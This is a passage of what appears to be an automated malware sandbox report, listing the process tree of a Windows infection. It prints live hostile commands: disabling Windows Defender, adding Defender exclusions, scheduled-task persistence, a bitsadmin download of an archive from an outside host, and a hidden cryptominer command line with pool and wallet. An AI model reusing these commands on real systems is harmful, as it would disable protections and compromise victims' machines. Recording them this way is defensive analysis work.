-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe & exit12⤵PID:17168
-
C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exeC:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe13⤵PID:6900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe & exit12⤵PID:17320
-
C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exeC:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe13⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Checks processor information in registry
PID:5432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5432 & erase C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe & RD /S /Q C:\\ProgramData\\248117682026473\\* & exit15⤵PID:8492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 543216⤵
- Kills process with taskkill
PID:8924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"14⤵
- Suspicious use of SetThreadContext
PID:5676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com15⤵PID:2264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:5644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com15⤵PID:10052
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run15⤵PID:12432
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop WinDefend16⤵PID:12488
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run15⤵PID:12536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse16⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:12560
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exeC:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe15⤵PID:12612
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe & exit12⤵PID:16924
-
C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exeC:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe13⤵PID:6828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive & exit12⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6260
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S & exit12⤵PID:7492
-
C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:3372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:5820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:10072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:10636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:10868
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:11072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:11292
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
PID:11532
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
PID:11756
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfT5WYVqWlNx1lAe -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
PID:2520
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pSEpyyqJOWlXpayv -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵PID:6496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:8700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:9060
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:9732
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:17108
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:10040
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui14⤵PID:9380
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll" AqDFSDlmWiui15⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:3132
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:10612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:4696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:11224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:8856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵PID:11676
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵PID:9400
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=654 & exit12⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exeC:\Users\Admin\AppData\Local\Temp\aocenda5.m35\installer.exe /qn CAMPAIGN=65413⤵PID:7736
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe"C:\Users\Admin\Pictures\Adobe Films\Twk74K5tf2RNDMdeHMLEJv3g.exe" silent8⤵PID:6380
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6440
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe"C:\Users\Admin\Pictures\Adobe Films\bo5pmCap6uvDHfHJN3UgwaJy.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1464 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:1912
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe"C:\Users\Admin\Pictures\Adobe Films\WPWSLBK9XTV3JK3FvDUtGufX.exe"6⤵
- Executes dropped EXE
PID:5588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5424
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe"C:\Users\Admin\Pictures\Adobe Films\RIp6KOn6bTquopPdWGDEO8OZ.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6024
-
-
C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe"C:\Users\Admin\Pictures\Adobe Films\RkZLuBmhzDRH1tonlD2y9chm.exe"6⤵
- Executes dropped EXE
PID:5496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1964
-
-
-
C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe"C:\Users\Admin\Pictures\Adobe Films\B3xGPO7uW7v2ADymt3FoIKP9.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5312
-
-
C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe"C:\Users\Admin\Pictures\Adobe Films\bWLj9lfauqRfDndQtgrXhtd9.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6116
-
-
C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5724 -
C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"C:\Users\Admin\Pictures\Adobe Films\YY4xjF_W3oy_kHfCFkzkO1C7.exe"7⤵PID:5144
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"6⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:6304 -
C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵PID:6776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f6e602fb-b513-419e-91ea-f37c59ced19d\test.bat"8⤵PID:6692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force7⤵PID:5124
-
-
C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe"7⤵PID:5432
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\hQVevJHT7ifZkZy5q0HwRySe.exe" -Force7⤵PID:6912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 24687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3348
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe"C:\Users\Admin\Pictures\Adobe Films\SGQDazRjK3dj9h5PYpsGlAad.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6476
-
-
C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe"C:\Users\Admin\Pictures\Adobe Films\iHWTBUxIpQQ2V0wNGbIoQRfC.exe"6⤵
- Executes dropped EXE
PID:6452
-
-
C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"6⤵
- Suspicious use of SetThreadContext
PID:6540 -
C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"C:\Users\Admin\Pictures\Adobe Films\RRLzwWRhJ6iHLobR1jUETLpO.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1904
-
-
-
C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe"C:\Users\Admin\Pictures\Adobe Films\B6nS5AmiDzBtFr8R73VmDVKW.exe"6⤵PID:7016
-
C:\Users\Admin\AppData\Roaming\4866014.scr"C:\Users\Admin\AppData\Roaming\4866014.scr" /S7⤵PID:6668
-
-
C:\Users\Admin\AppData\Roaming\7641623.scr"C:\Users\Admin\AppData\Roaming\7641623.scr" /S7⤵PID:6500
-
-
C:\Users\Admin\AppData\Roaming\6482018.scr"C:\Users\Admin\AppData\Roaming\6482018.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5844
-
-
C:\Users\Admin\AppData\Roaming\8270222.scr"C:\Users\Admin\AppData\Roaming\8270222.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
PID:5056
-
-
C:\Users\Admin\AppData\Roaming\8104654.scr"C:\Users\Admin\AppData\Roaming\8104654.scr" /S7⤵PID:6176
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:4264
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵
- Executes dropped EXE
PID:1044 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4756
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4692 -
C:\Users\Admin\AppData\Roaming\2512986.scr"C:\Users\Admin\AppData\Roaming\2512986.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5772
-
-
C:\Users\Admin\AppData\Roaming\8167987.scr"C:\Users\Admin\AppData\Roaming\8167987.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5920
-
-
C:\Users\Admin\AppData\Roaming\1092981.scr"C:\Users\Admin\AppData\Roaming\1092981.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1512
-
-
C:\Users\Admin\AppData\Roaming\7365935.scr"C:\Users\Admin\AppData\Roaming\7365935.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\5472694.scr"C:\Users\Admin\AppData\Roaming\5472694.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:5888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 2449⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3Q2A4.tmp\setup.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5848 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Executes dropped EXE
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SV2IC.tmp\setup.tmp" /SL5="$3026A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EIMN7.tmp\postback.exe" ss111⤵
- Executes dropped EXE
PID:2164
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:5748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:7124
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5180
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
PID:6760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:7080
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:7396
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:5140
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:7368
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
PID:2008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 3246⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4760
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:4288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\7zS454469E3\Mon206d48916f93c5.exeMon206d48916f93c5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3168 -
C:\Users\Admin\AppData\Roaming\1378103.scr"C:\Users\Admin\AppData\Roaming\1378103.scr" /S2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Users\Admin\AppData\Roaming\2303097.scr"C:\Users\Admin\AppData\Roaming\2303097.scr" /S2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Users\Admin\AppData\Roaming\6821963.scr"C:\Users\Admin\AppData\Roaming\6821963.scr" /S2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1492 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
PID:6052
-
-
-
C:\Users\Admin\AppData\Roaming\7406868.scr"C:\Users\Admin\AppData\Roaming\7406868.scr" /S2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2912 -ip 29121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2008 -ip 20081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2200 -ip 22001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1100
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5840
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5508
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2306010a9752f376cff4bbee56aa08eb c4QZvIvDlEangE8xJGiw+w.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:5792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5560 -ip 55601⤵PID:5732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3504 -ip 35041⤵PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1044 -ip 10441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5388 -ip 53881⤵
